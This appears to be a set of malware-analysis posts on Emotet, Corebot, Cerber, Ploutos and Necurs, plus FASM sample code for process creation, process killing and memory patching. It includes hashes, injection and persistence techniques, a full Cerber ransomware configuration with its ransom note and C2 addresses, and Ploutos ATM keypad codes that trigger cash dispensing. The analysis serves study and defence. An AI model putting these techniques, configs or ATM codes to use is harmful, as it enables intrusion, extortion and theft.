Emotet Banking Trojan: Malware Analysis

Goal: Reverse the pervasive Trojan banking Trojan “Emotet.”

MD5: bccf2bba9cd34b2fffa13bfaa9dd73d0
SHA-1: 2bda61456d64a2c509b19d49516f5c942be90d44
SHA256: 9bb033dc2815798cd2c8b1a496c319a190a29ca59ea1053ab0b6fcf809630036
Imphash: 4c523782bd5ed7ca8f9ac7efc2d8d75f
Other related samples based on the variant’s imphash:
  • 9bb033dc2815798cd2c8b1a496c319a190a29ca59ea1053ab0b6fcf809630036
  • 33441312c20fbeccffceb522e626aa47366a966c48be537d82d4ecc60858d14c
  • 3d41a652e368875bdf55653dc4c43237f4b0eb70c028fe43454be02309cfc11b
  • ff25f74c91530371232bb7f5350d14252499de9a748a5e76d4b40959e64cfd30
  • 8102bda902667eabb34ebaf84f6ff15fb01804811c4b5bc4d6ac1a3871ea985a
  • ae8ef4600413adc25b32d202a8e2a4042650c234cde969251861b9ea2b2391f9
  • f5b8507645d9a2b672515bc990d149566e6272802c339219c2bd9e0ee19a1b88
  • 38a7f6b64f72c9202489b7e028a65f19cf0ff7008de7330e9f6154223e7dda78
  • df277353e4ec5d69a24b570f31fbc2376f35e6e18457d1985f556efee633456c
Emotet queries HKCU and HKLM Shell Folder directories:
The malware copies itself into %APPDATA%\QuotaSms as “QuotaSms[.]exe”:
Emotet Trojan creates persistency as an lnk file in the Startup directory:
Emotet creates an identical process as “CREATE_SUSPENDED,” injects itself into it via WriteProcessMemory, launches the new ResumeThread and kills the main process.

Dynamic Analysis: Emotet Trojan
+ Utilizes dynamic API loading via GetProcAddress
+ Implements self-kill routine via CreateThread with WriteProcessMemory
+ Creates multiple suspended threads and writes malware into them using WriteProcessMemory
+ Creates persistency as a QuotaSms[.]exe lnk file in Startup directory
+ Copies itself into %APPDATA%
+ Queries SSL :443 server and get assigned a peer at :8080

0027s > AnalyzeProcess pid:5600 C:\Documents and Settings\Administrator\Desktop\emotet[.]exe
0059s >  WriteProcessMemory
File: emotet[.]exe
Size: 216576 Bytes
MD5: BCCF2BBA9CD34B2FFFA13BFAA9DD73D0

Corebot Modular Trojan: Malware Analysis

Goal: Dissect modular Corebot banking Trojan with its DGA, rootkit, Powershell, runas, screenshot, process injection into svchost in SUSPENDED_MODE, and other modules.



MD5: 854d7769ed01915df8374ff18ae6785e
SHA-1: f923923e7af017e77e80d57578cfd88b990ce1e5
SHA-256: 0ce3290ed92979a5f13fbb799d7128e9dbc579e3f1bea3b560551a73f482de8f
imphash: 63c53219cb193f80ff22f173a8ffef05
Size: 640.0 KB (655361 bytes)

Static Analysis: Corebot 
PDB: .rdata:00D14278 C:\\work\\itco\\core\\bin\\x86\\Release\\core[.]pdb\
Timestamp: Wed Oct 14 07:56:42 2015

Inject functions:


   
Powershell module (powershell[.]exe -NonInteractive -NoProfile -NoLogo -ExecutionPolicy Unrestricted -File “%s” via “cmd mode con cols=4000 line s=1000”):


Self-deletion batch script:

Runas as explorer[.]exe module:


User-mode rootkit module -> “\\\\.\\PhysicalDrive0”:



Xfer from the user-mode rootkit module routine:

DGA seed algorithm:

Create a process %WINDIR%\System32\svchost[.]exe with the CREATE_SUSPENDED flag. The primary thread of the new process is created in a suspended state, and does not run until the ResumeThread function is called.



Red Flags:
  • The file modifies the registry
  • The file references Alternate Data Stream (ADS)
  • The file is scored (40/54) by VirusTotal
  • The file references the Remote Desktop Session Host Server
  • The file references the Windows Native API
  • The file references the Security Descriptor Definition Language (SDDL)
  • The file references the Service Control Manager (SCM)
  • The file references the Desktop window
  • The file references the Windows Cryptographic interface
  • The file references the Windows Debug Helper interface
  • The file queries for files and streams
  • The file references the Event Log
  • The file references Inter-Process Communication (IPC)
  • The file references the Domain Name System (DNS) API 
  • The file references data on a Socket
  • The file references the RPC Network Data Representation (NDR) Engine
  • The file opts for Address Space Layout Randomization (ASLR)
  • The file opts for cookies on the stack (GS)
  • The file imports 2 decorated symbol(s)
  • The file has no Version
  • The file does not contain a digital certificate
  • The file checksum (0x00000000) is invalid
  • The debug file name (core[.]pdb) is different than the file name (corebot[.]exe)
Dynamic Analysis: Corebot

Mutexes
————————————————–

  • ::62DFDF4F-C9F7-4416-9688-41C7791D0C33  
  • {F4EE296B-9B08-4B04-8443-7E76A45FE740}


Process Analysis Log:
  • Process: svchost[.]exe
  • Size: 14336 Bytes
  • MD5: 27C6D03BCDB8CFEB96B716F3D8BE3E18

—————————————————————————                         

Monitored RegKeys
Path -> Value *
————————————————–
Path: HKCU\Software\Microsoft\Windows\CurrentVersion\Run –> Value: 1932a393-6ee2-a084-05de-868ddc92d287=C:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\46604e10-2147-a135-0a93-c63f477cff8d\272f38ca-8023-4abc-a8f7-91009ce205a7[.]exe


Domain Generation Algorithm (DGA) resolution ending in *ddns[.]net:

Other bot information collector procedure forming request:
  • os_version
  • version
  • process_name
  • os_version_short
  • volume_sn
  • country_name
  • lang_name
  • default_browser
  • os_arch
  • is_admin
  • is_admin_group

p.p1 {margin: 0.0px 0.0px 0.0px 0.0px; line-height: 20.0px; font: 13.0px ‘Helvetica Neue’; color: #333333; -webkit-text-stroke: #333333} p.p2 {margin: 0.0px 0.0px 0.0px 0.0px; line-height: 20.0px; font: 13.0px ‘Helvetica Neue’; color: #777777; -webkit-text-stroke: #777777} p.p3 {margin: 0.0px 0.0px 0.0px 0.0px; line-height: 20.0px; font: 13.0px ‘Helvetica Neue’; color: #333333; -webkit-text-stroke: #333333; min-height: 15.0px} p.p4 {margin: 0.0px 0.0px 0.0px 0.0px; font: 11.0px Helvetica; color: #000000; -webkit-text-stroke: #000000; min-height: 13.0px} p.p5 {margin: 0.0px 0.0px 0.0px 0.0px; font: 11.0px Helvetica; color: #000000; -webkit-text-stroke: #000000} span.s1 {font-kerning: none} span.s2 {text-decoration: underline ; font-kerning: none} span.Apple-tab-span {white-space:pre}

05-22-2017 Reversing: Cerber Ransomware Configuration

Type: Ransomware
Variant: Cerber
Malware Source521089667da9de525381eb23c780ad8b3d6e64d9c95a71f10d8f6d4f2af1f561
Config SourceGitHub


Cerber Configuration:

I. [crbr]{“b“:”17gd1msp5FnMcEMF1MitTNSsYs7w7AQyCt”,”i:”17513″,”o“:”p27dokhpz2n7nvgr”,”p“:[“129p1t[.]top”,”1apgrn[.]top”,”1p5fwl[.]top”,”1cknbd[.]top”,”1fu8p3[.]top”]}[crbr]

II. {“blacklist“:{“extensions“:[“.bat”,”.cmd”,”.com”,”.cpl”,”.dll”,”.exe”,”.hta”,”.msc”,”.msi”,”.msp”,”.pif”,”.scf”,”.scr”,”.sys”],”files“:[“bootsect.bak”,”iconcache.db”,”ntuser.dat”,”thumbs.db”],”folders”:[“:\\$getcurrent\\”,”:\\$recycle.bin\\”,”:\\$windows.~bt\\”,”:\\$windows.~ws\\”,”:\\boot\\”,”:\\documents and settings\\all users\\”,”:\\documents and settings\\defaultuser\\”,”:\\documents and settings\\localservice\\”,”:\\documents and settings\\networkservice\\”,”:\\intel\\”,”:\\msocache\\”,”:\\perflogs\\”,”:\\program files (x86)\\”,”:\\program files\\”,”:\\programdata\\”,”:\\recovery\\”,”:\\recycled\\”,”:\\recycler\\”,”:\\system volume information\\”,”:\\temp\\”,”:\\windows.old\\”,”:\\windows10upgrade\\”,”:\\windows\\”,”:\\winnt\\”,”\\appdata\\local\\”,”\\appdata\\locallow\\”,”\\appdata\\roaming\\”,”\\local settings\\”,”\\public\\music\\sample music\\”,”\\public\\pictures\\sample pictures\\”,”\\public\\videos\\sample videos\\”,”\\tor browser\\”],”languages“:[1049,1058,1059,1064,1067,1068,1079,1087,1088,1090,1091,1092,2072,2073,2092,2115]},”check“:{“language“:1},”debug”:0,”default”:{“bchn“:”17gd1msp5FnMcEMF1MitTNSsYs7w7AQyCt”,”site_1“:”tor2web[.]org”,”site_2“:”onion[.]link”,”site_3“:”onion.nu”,”site_4“:”onion[.]cab”,”site_5“:”onion.to”,”tor“:”p27dokhpz2n7nvgr”},”encrypt“:{“bytes_skip“:1792,”divider“:262144,”encrypt“:1,”files”:[[“.123″,”.1cd”,”.3dm”,”.3ds”,”.3fr”,”.3g2″,”.3gp”,”.3pr”,”.602″,”.7z”,”7zip”,”.aac”,”.ab4″,”.abd”,”.acc”,”.accdb”,”.accde”,”.accdr”,”.accdt”,”.ach”,”.acr”,”.act”,”.adb”,”.adp”,”.ads”,”.aes”,”.agdl”,”.ai”,”.aiff”,”.ait”,”.al”,”.aoi”,”.apj”,”.apk”,”.arc”,”.arw”,”.ascx”,”.asf”,”.asm”,”.asp”,”.aspx”,”.asset”,”.asx”,”.atb”,”.avi”,”.awg”,”.back”,”.backup”,”.backupdb”,”.bak”,”.bank”,”.bat”,”.bay”,”.bdb”,”.bgt”,”.bik”,”.bin”,”.bkp”,”.blend”,”.bmp”,”.bpw”,”.brd”,”.bsa”,”.bz2″,”.c”,”.cash”,”.cdb”,”.cdf”,”.cdr”,”.cdr3″,”.cdr4″,”.cdr5″,”.cdr6″,”.cdrw”,”.cdx”,”.ce1″,”.ce2″,”.cer”,”.cfg”,”.cfn”,”.cgm”,”.cib”,”.class”,”.cls”,”.cmd”,”.cmt”,”.config”,”.contact”,”.cpi”,”.cpp”,”.cr2″,”.craw”,”.crt”,”.crw”,”.cry”,”.cs”,”.csh”,”.csl”,”.csr”,”.css”,”.csv”,”.d3dbsp”,”.dac”,”.das”,”.dat”,”.db”,”.db3″,”.db_journal”,”.dbf”,”.dbx”,”.dc2″,”.dch”,”.dcr”,”.dcs”,”.ddd”,”.ddoc”,”.ddrw”,”.dds”,”.def”,”.der”,”.des”,”.design”,”.dc”,”.dgn”,”.dif”,”.dip”,”.dit”,”.djv”,”.djvu”,”.dng”,”.doc”,”.docb”,”.docm”,”.docx”,”.dot”,”.dotm”,”.dotx”,”.drf”,”.drw”,”.dtd”,”.dwg”,”.dxb”,”.dxf”,”.dxg”,”.edb”,”.eml”,”.eps”,”.erbsql”,”.erf”,”.exf”,”.fdb”,”.ffd”,”.fff”,”.fh”,”.fhd”,”.fla”,”.flac”,”.flb”,”.flf”,”.flv”,”.forge”,”.fpx”,”.frm”,”.fxg”,”.gbr”,”.gho”,”.gif”,”.gpg”,”.gray”,”.grey”,”.groups”,”.gry”,”.gz”,”.h”,”.hbk”,”.hdd”,”.hpp”,”.html”,”.hwp”,”.ibank”,”.ibd”,”.ibz”,”.idx”,”.iif”,”.iiq”,”.incps”,”.indd”,”.info”,”.info_”,”.iwi”,”.jar”,”.java”,”.jnt”,”.jpe”,”.jpeg”,”.jpg”,”.js”,”.json”,”.k2p”,”.kc2″,”.kdbx”,”.kdc”,”.key”,”.kpdx”,”.km”,”.laccdb”,”.lay”,”.lay6″,”.lbf”,”.lck”,”.ldf”,”.lit”,”.litemod”,”.litesql”,”.lock”,”.ltx”,”.lua”,”.m”,”.m2ts”,”.m3u”,”.m4a”,”.m4p”,”.m4u”,”.m4v”,”.ma”,”.mab”,”.mapimail”,”.max”,”.mbx”,”.md”,”.mdb”,”.mdc”,”.mdf”,”.mef”,”.mfw”,”.mid”,”.mkv”,”.mlb”,”.mml”,”.mmw”,”.mny”,”.money”,”.moneywell”,”.mos”,”.mov”,”.mp3″,”.mp4″,”.mpeg”,”.mpg”,”.mrw”,”.ms11″,”.msf”,”.msg”,”.mts”,”.myd”,”.myi”,”.nd”,”.ndd”,”.ndf”,”.nef”,”.nk2″,”.nop”,”.nrw”,”.ns2″,”.ns3″,”.ns4″,”.nsd”,”.nsf”,”.nsg”,”.nsh”,”.nvram”,”.nwb”,”.nx2″,”.nxl”,”.nyf”,”.oab”,”.obj”,”.odb”,”.odc”,”.odf”,”.odg”,”.odm”,”.odp”,”.ods”,”.odt”,”.ogg”,”.oil”,”.omg”,”.one”,”.onenotec2″,”.orf”,”.ost”,”.otg”,”.oth”,”.otp”,”.ots”,”.ott”,”.p12″,”.p7b”,”.p7c”,”.pab”,”.pages”,”.paq”,”.pas”,”.pat”,”.pbf”,”.pcd”,”.pct”,”.pdb”,”.pdd”,”.pdf”,”.pef”,”.pem”,”.pfx”,”.php”,”.pif”,”.pl”,”.plc”,”.plus_muhd”,”.pm”,”.pm!”,”.pmi”,”.pmj”,”.pml”,”.pmm”,”.pmo”,”.pmr”,”.pnc”,”.pnd”,”.png”,”.pnx”,”.pot”,”.potm”,”.potx”,”.ppam”,”.pps”,”.ppsm”,”.ppsx”,”.ppt”,”.pptm”,”.pptx”,”.prf”,”.private”,”.ps”,”.psafe3″,”.psd”,”.pspimage”,”.pst”,”.ptx”,”.pub”,”.pwm”,”.py”,”.qba”,”.qbb”,”.qbm”,”.qbr”,”.qbw”,”.qbx”,”.qby”,”.qcow”,”.qcow2″,”.qed”,”.qtb”,”.r3d”,”.raf”,”.rar”,”.rat”,”.raw”,”.rb”,”.rdb”,”.re4″,”.rm”,”.rtf”,”.rvt”,”.rw2″,”.rwl”,”.rwz”,”.s3db”,”.safe”,”.sas7bdat”,”.sav”,”.save”,”.say”,”.sch”,”.sd0″,”.sda”,”.sdb”,”.sdf”,”.secret”,”.sh”,”.sldm”,”.sldx”,”.slk”,”.slm”,”.sql”,”.sqlite”,”.sqlite-shm”,”.sqlite-wal”,”.sqlite3″,”.sqlitedb”,”.sr2″,”.srb”,”.srf”,”.srs”,”.srt”,”.srw”,”.st4″,”.st5″,”.st6″,”.st7″,”.st8″,”.stc”,”.std”,”.sti”,”.stl”,”.stm”,”.stw”,”.stx”,”.svg”,”.swf”,”.sxc”,”.sxd”,”.sxg”,”.sxi”,”.sxm”,”.sxw”,”.tar”,”.tax”,”.tbb”,”.tbk”,”.tbn”,”.tex”,”.tga”,”.tgz”,”.thm”,”.tif”,”.tiff”,”.tlg”,”.tlx”,”.txt”,”.uop”,”.uot”,”.upk”,”.usr”,”.vb”,”.vbox”,”.vbs”,”.vdi”,”.vhd”,”.vhdx”,”.vmdk”,”.vmsd”,”.vmx”,”.vmxf”,”.vob”,”.vpd”,”.vsd”,”.wab”,”.wad”,”.wallet”,”.war”,”.wav”,”.wb2″,”.wk1″,”.wks”,”.wma”,”.wmf”,”.wmv”,”.wpd”,”.wps”,”.x11″,”.x3f”,”.xis”,”.xla”,”.xlam”,”.xlc”,”.xlk”,”.xlm”,”.xlr”,”.xls”,”.xlsb”,”.xlsm”,”.xlsx”,”.xlt”,”.xltm”,”.xltx”,”.xlw”,”.xml”,”.xps”,”.xxx”,”.ycbcra”,”.yuv”,”.zip”]],”max_block_size“:128,”min_file_size“:2048,”multithread“:1,”network“:1,”rsa_key_size“:880,”threads_per_core“:1},”files_name“:”_R_E_A_D___T_H_I_S___{RAND}_”,”run_by_the_end”:1},”self_deleting“:1,”servers“:{“statistics”:{“data_finish“:”e01ENV9LRVl9″,”data_start“:”e01ENV9LRVl9e1BBUlRORVJfSUR9e09TfXtJU19YNjR9e0lTX0FETUlOfXtDT1VOVF9GSUxFU317U1RPUF9SRUFTT059e1NUQVRVU30=”,”ip“:[“178[.]33[.]158[.]0/27″,”178[.]33[.]159[.]0/27″,”178[.]33[.]160[.]0/22″],”port“:6893,”send_stat“:1,”timeout“:255}},”wallpaper“:{“change_wallpaper”:1,”background“:139,”color“:16777215,”size“:13,”text“:”                     \n  CERBER RANSOMWARE  \n                     \n\n  YOUR DOCUMENTS, PHOTOS, DATABASES AND OTHER IMPORTANT FILES  \n  HAVE BEEN ENCRYPTED!  \n\n  The only way to decrypt your files is to receive  \n  the private key and decryption program.  \n\n  To receive the private key and decryption program  \n  go to any decrypted folder – inside there is the special file (*_READ_THIS_FILE_*)  \n  with complete instructions how to decrypt your files.  \n\n  If you cannot find any (*_READ_THIS_FILE_*) file at your PC,  \n  follow theinstructions below:  \n\n  1. Download \”Tor Browser\” from https://www.torproject%5B.%5Dorg/ and install it.  \n  2. In the \”Tor Browser\” open your personal page here:  \n\n  http://{TOR}.onion/{PC_ID}  \n\n  Note! This page is available via \”Tor Browser\”only.  \n\n\n”},” p.p1 {margin: 0.0px 0.0px 0.0px 0.0px; font: 12.0px Helvetica; min-height: 14.0px} p.p2 {margin: 0.0px 0.0px 0.0px 0.0px; font: 12.0px Helvetica}

p.p1 {margin: 0.0px 0.0px 0.0px 0.0px; font: 12.0px Helvetica; min-height: 14.0px} p.p2 {margin: 0.0px 0.0px 0.0px 0.0px; font: 12.0px Helvetica} p.p1 {margin: 0.0px 0.0px 0.0px 0.0px; font: 12.0px Helvetica; min-height: 14.0px} p.p2 {margin: 0.0px 0.0px 0.0px 0.0px; font: 12.0px Helvetica}

FASM: Flat Assembler, also known as "FASM": Sample Code

Goal: Enrich own understanding of the Flat Assember (FASM) code constructs to enhance malware analysis and forward-engineering skills especially with PE files. I find it to be extremely helpful to have code samples ready to use/analyze.
SourceBetamaster

Why FASM?
FASM is a 32-bit, open-source, cross-platform assembler, targeting the IA-32 and x86-64 architectures (in addition, FASMARM – in unofficial port of FASM, targets the ARM architecture). It is very lightweight, fast, and rather simple to leverage in Windows API programming challenges.

I. Simple Application: Hello World

01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
format PE console
entry start
 
include 'win32a.inc'
 
;======================================
section '.data' data readable writeable
;======================================
 
hello_newline    db "Hello World!",10,0
hello_no_newline db "Hello World! (without a new line)",0
 
;=======================================
section '.code' code readable executable
;=======================================
 
start:
 
        ccall   [printf],hello_newline      ; Print 'Hello World!' and start a new line.
        ccall   [printf],hello_no_newline   ; Print 'Hello World!' without starting a new line.
 
        ccall   [getchar]                   ; I added this line to exit the application AFTER the user pressed any key.
        stdcall [ExitProcess],0             ; Exit the application
 
;====================================
section '.idata' import data readable
;====================================
 
library kernel,'kernel32.dll',\
        msvcrt,'msvcrt.dll'
 
import  kernel,\
        ExitProcess,'ExitProcess'
 
import  msvcrt,\
        printf,'printf',\
        getchar,'_fgetchar


II. Create a process

01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19
format PE GUI 4.0
entry start
 
include 'win32a.inc'
 
start:
 invoke CreateProcessA,txt_location,0,0,0,0,CREATE_NEW_CONSOLE,0,0,StartupInfo,ProcessInfo
 call [ExitProcess]
 
; Custom Data: Contains the location of notepad.exe, StartupInfo and ProcessInfo:
section '.data' data readable writeable
 txt_location db 'C:\Windows\System32\notepad.exe',0
 StartupInfo STARTUPINFO
 ProcessInfo PROCESS_INFORMATION
 
; Imported functions and corresponding names of DLL files:
section '.idata' import data readable writeable
 library kernel,'KERNEL32.DLL'
 
 import kernel,\
 CreateProcessA, "CreateProcessA",\
 ExitProcess,'ExitProcess'


III. Kill a process

01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
format PE GUI 4.0
entry start
 
include 'win32a.inc'
 
;================== code =====================
section '.code' code readable executable
;=============================================
 
start:
        invoke GetCurrentProcess                                                ; Retrieve a pseudo handle for current process
        invoke OpenProcessToken,eax,TOKEN_QUERY_TOKEN_ADJUST_PRIVILEGES,phToken ; Open access token associated with this process
        invoke LookupPrivilegeValue,0,Privilege ,pLocalId                       ; Retrieve the locally unique identifier (LUID)
        mov    [PrivilegeCount],1                                               ; [PrivilegeCount] = 1
        mov    [Attributes],2                                                   ; [Attributes]     = 2
        invoke AdjustTokenPrivileges,[phToken],0,PrivilegeCount ,0,0,0          ; Enable privileges on our token
 
        mov    [prcs.dwSize],sizeof.PROCESSENTRY32                              ; Store the required size of PROCESSENTRY32 in prcs.dwSize
        invoke CreateToolhelp32Snapshot, TH32CS_SNAPPROCESS, 0                  ; Take a snapshot of the specified processes (get all running processes)
        mov    [hSnapshot], eax                                                 ; Save the snapshot handle
        invoke Process32First,[hSnapshot],prcs                                  ; Retrieve information about the first process encountered in our system snapshot
.loop:
        mov    edi,PrcList                                                      ; EDI = filename of process we want to kill
        invoke StrStrI,prcs.szExeFile, edi                                      ; Compare the current process name with the one we want to kill
        cmp    eax,0                                                            ; - || -
        je     .next                                                            ; Jump = Not equal, continue with the next process
        call   kill                                                             ; Else : Kill the process
.next:
        invoke Process32Next,[hSnapshot],prcs                                   ; Retrieve the next process in our snapshot
        cmp    eax,0                                                            ; Check if there are still processes we didn't check
        jne    .loop                                                            ; Jump = Continue the loop with the current process
        invoke ExitProcess,0                                                    ; Else : No more processes. Exit.
kill:
        invoke OpenProcess,PROCESS_TERMINATE,0,[prcs.th32ProcessID]             ; Open the process with terminate privileges
        invoke TerminateProcess,eax,0                                           ; Terminate it (Kill process)
        retn                                                                    ; And return (= exit as well)
 
;=================== data ====================
section '.data' data readable writeable
;=============================================
 
TOKEN_QUERY_TOKEN_ADJUST_PRIVILEGES =28h
TH32CS_SNAPPROCESS = 2
 
struct PROCESSENTRY32
        dwSize dd ?
        cntUsage dd ?
        th32ProcessID dd ?
        th32DefaultHeapID dd ?
        th32ModuleID dd ?
        cntThreads dd ?
        th32ParentProcessID dd ?
        pcPriClassBase dd ?
        dwFlags dd ?
        szExeFile db 260 dup(?)
ends
 
PrivilegeCount dd ?
pLocalId       dd ?
Attributes     dd ?
phToken        dd ?
hSnapshot      dd ?
prcs           PROCESSENTRY32
 
PrcList        db 'calc.exe',0
Privilege      db 'SeDebugPrivilege',0
 
;=============================================
section '.idata' import data readable
;=============================================
 
library         kernel32,'KERNEL32.DLL',\
                advapi32,'ADVAPI32.DLL',\
                shell32,'SHELL32.DLL'
 
include 'API\kernel32.inc'
include 'API\advapi32.inc'
include 'API\shell32.inc'


III. WriteProcessMemory

01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
format PE GUI 4.0
entry start
 
include 'win32a.inc'
 
;================== code =====================
section '.code' code readable executable
;=============================================
 
proc start
 
        invoke FindWindow, NULL, WindowTitle           ; Find the window titled 'Notepad'
        test eax,eax                                   ; Test whether a window with that title was found or not
        jnz .ju1                                       ; Don't jump = The window was not found
        invoke MessageBox,0, message1, caption, MB_OK  ; - Display an error message (Window not found)
        jmp .exit                                      ; - Exit the application
.ju1:                                                  ; Jumped     = The window was found
        invoke GetWindowThreadProcessId, eax, ProcID   ; Get the ProcessID via the window handle
        invoke OpenProcess, 0x1F0FFF, FALSE, [ProcID]  ; Open the process using PROCESS_ALL_ACCESS (0x1F0FFF) and get a handle
        mov dword[ProcHandle],eax                      ; Save the handle
 
        ; VirtualAllocEx: Reserves/commits a region of memory within the virtual address space of out target process
        ; We should do this in order to avoid potential access violations (which might cause crashes)
        invoke VirtualAllocEx,dword [ProcHandle], 0, patchSize, MEM_COMMIT, PAGE_READWRITE
        cmp eax, 0                                     ; EAX == 0 : Failed to reserve the memory region
        jnz .cont                                      ; EAX != 0 : Continue with further steps
        invoke MessageBox,0, message4, caption, MB_OK  ; Display an error: VirtualAllocEx failed to reserve the memory region
        jmp .exit                                      ; Exit the application
.cont:
        invoke WriteProcessMemory, dword[ProcHandle], dword[startAddress], patchBytes, patchSize, patchResult
        cmp [patchResult],patchSize                    ; Compare the number of patched bytes with the length of our new bytes
        je .ju2                                        ; Don't jump = Failed to patch the target
        invoke MessageBox,0, message3, caption, MB_OK  ; - Display an error message (An error occured)
        jmp .exit                                      ; - Exit the application
.ju2:                                                  ; Jumped     = Target patched successfully.
        invoke MessageBox,0, message2, caption, MB_OK  ; Display: The target has been patched successfully
.exit:                                                 ; Jumper: Here we're going to exit our application
        invoke  ExitProcess, 0                         ; ExitProcess
 
endp
 
;=================== data ====================
section '.data' data readable writeable
;=============================================
 
WindowTitle     db 'Notepad', 0                        ; Holds the window title   of the target application
ProcID          dd ?                                   ; Holds the process ID     of the target application
ProcHandle      db ?                                   ; Holds the process handle of the target application
 
caption         db 'Information', 0                    ; The caption displayed in all MessageBoxes
message1        db 'Unable to find the window', 0      ; Message: Window not found
message2        db 'Patched successfully',0            ; Message: Target patched successfully
message3        db 'Patching: An error occured',0      ; Message: An error occured while patching the target
message4        db 'VirtualAllocEx failed',0           ; Message: Failed to successfully execute VirtualAllocEx
 
startAddress    dd 0x00401090                          ; The memory address we're starting to write from
patchBytes      db 0x2F,0x66                           ; These bytes will be written into the memory of our target executable
patchSize       =  $ - patchBytes                      ; Holds the number of bytes we're going to write
patchResult     dd ?                                   ; Holds the number of successfully written bytes
 
;=============================================
section '.idata' import data readable
;=============================================
 
library         kernel32,'KERNEL32.DLL',\
                user32,'USER32.DLL'
 
import          kernel32,\
                ExitProcess,'ExitProcess',\
                OpenProcess,'OpenProcess',\
                VirtualAllocEx, "VirtualAllocEx",\
                WriteProcessMemory,'WriteProcessMemory'
 
import          user32,\
                FindWindow,'FindWindowA',\
                GetWindowThreadProcessId,'GetWindowThreadProcessId',\
                MessageBox,'MessageBoxA'


IV. Copy a file

1
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
format PE GUI 4.0
entry start
 
include 'win32ax.inc'
 
;================== code =====================
section '.code' code readable executable
;=============================================
 
proc start
        mov [lpFileOp.wFunc],FO_COPY             ; We want the shell to copy a file
        mov [lpFileOp.fFlags],FOF_SILENT         ; .. silently
        mov [lpFileOp.pFrom],SzFileFrom          ; The file which is going to be copied
        mov [lpFileOp.pTo],SzFileTo              ; The name of the new file
 
        invoke SHFileOperationA,lpFileOp         ; Execute the operation
 
        invoke ExitProcess,NULL                  ; Exit this program
endp
 
;=================== data ====================
section '.data' data readable writeable
;=============================================
 
FO_COPY    = 2
FOF_SILENT = 4
SzFileFrom db 'source.txt',0
SzFileTo   db 'target.txt',0
 
struct  SHFILEOPSTRUCT
        hWnd dd ?
        wFunc dd ?
        pFrom dd MAX_PATH
        pTo dd MAX_PATH
        fFlags dw ?
        fAnyOperationsAborted dd ?
        hNameMappings dd ?
        lpszProgressTitle dd ?
ends
 
lpFileOp SHFILEOPSTRUCT
 
;=============================================
section '.idata' import data readable
;=============================================
 
library         kernel32,'KERNEL32.DLL',\
                shell32,'SHELL32.DLL'
 
import          kernel32,\
                ExitProcess,'ExitProcess'
 
import          shell32,\
                SHFileOperationA,'SHFileOperationA'

V.  Read a file

01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
format pe console 4.0
include 'WIN32AX.INC'
 
.data
        FileTitle db 'file.txt',0
        hFile dd ?
        nSize dd ?
        lpBytesRead dd ?
        lpBuffer rb 8192
 
        MessageBoxCaption db 'Output:',0
.code
        main:
        invoke  CreateFile, FileTitle, GENERIC_READ, 0, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0 ; Open the file (to get its handle)
        ; TODO: TestApiError
        mov [hFile], eax ; Save the file's handle to hFile
        invoke  GetFileSize, [hFile], 0 ; Determine the file size
        ; TODO: TestApiError
        mov [nSize], eax ; Save the file size given by EAX
        invoke  ReadFile, [hFile], lpBuffer, [nSize], lpBytesRead, 0 ; Now read the full file
        ; TODO: TestApiError
        invoke CloseHandle, [hFile] ; Handle should be closed after the file has been read
        invoke MessageBox, NULL, addr lpBuffer, addr MessageBoxCaption, MB_OK ; Easy way of outputing the text
        invoke  ExitProcess, 0
 
.end main

VI. Write a file

01
02
03
04
05
06
07
08
09
10
11
12
13
14
format pe console 4.0
include 'WIN32AX.INC'
 
.data
 buf db 'TEST'
 bufsize = $ - buf
 byteswritten dd ?
.code
 main:
 invoke  CreateFile, 'test.txt', GENERIC_WRITE, 0, 0, 4, FILE_ATTRIBUTE_NORMAL, 0
 invoke  WriteFile, eax, buf, bufsize, byteswritten, 0
 invoke  ExitProcess, 0
 
.end main

Ploutos ATM Malware Analysis

Source: VirusTotal

 File identification
MD5 eca2ca8ecf63816d9a157888e3d871dc
SHA1 b0b13b336ee8770bb2a90fb1292fd9dcabd046f4
SHA256 d99339d3dc6891cdd832754c5739640c62cd229c84e04e9e3cad743c6f66b1b9

 FileVersionInfo properties
Copyright
Copyright © Ploutos 2013

Product Ploutos
Original name Ploutos.exe
Internal name Ploutos.exe
File version 1.0.0.0
Description Ploutos
 PE header basic information
Target machine Intel 386 or later processors and compatible processors
Compilation timestamp 2013-07-24 07:09:14
Entry Point 0x0000944E
Number of sections 3
 .NET details
Module Version ID b943871a-96c9-53f0-1673-9625474d13a6
 PE sections
 PE imports
[+] mscoree.dll
 Number of PE resources by type
RT_MANIFEST 1
RT_VERSION 1
 Number of PE resources by language
NEUTRAL 2

The following command codes, entered using the ATM keypad, and their purpose are as follows:

12340000: To test if the keyboard is receiving commands.

12343570: Generate ATM ID, which is stored in the DATAA entry in the config.ini file.

12343571XXXXXXXX: Has two actions:

Activate ATM ID by generating an activation code based on an encoded ATM ID and the current date. This value is stored in the DATAC entry in the config.ini file. The eight bytes read in must be a valid encoded ATM ID generated by a function called CrypTrack(). A valid ATM activation code must be obtained in order for the ATM to dispense cash.
    Generate timespan: Sets a timer to dispense money, the value will be stored in the DATAB entry in the config.ini file.


12343572XX: Commands the ATM to dispense money. The removed digits represent the number of bills to dispense.   

Malware Forensics: Necurs Dropper via NTSecureSys

Source: Immunity Debugger, IDA Pro



File: necurs_dropper[.]exe
Size: 97792 Bytes
MD5: 6B3D2D146E683DAF0DEB906D57393E22

Mutex:
Name *    
————————————————–
   Instance0:  ESENT Performance Data Schema Version 40  

Ports:
Port    PID    Type    Path    
————————————————–

  • 3417    2688 TCP    C:\Documents and Settings\Administrator\Desktop\dropper[.]exe    
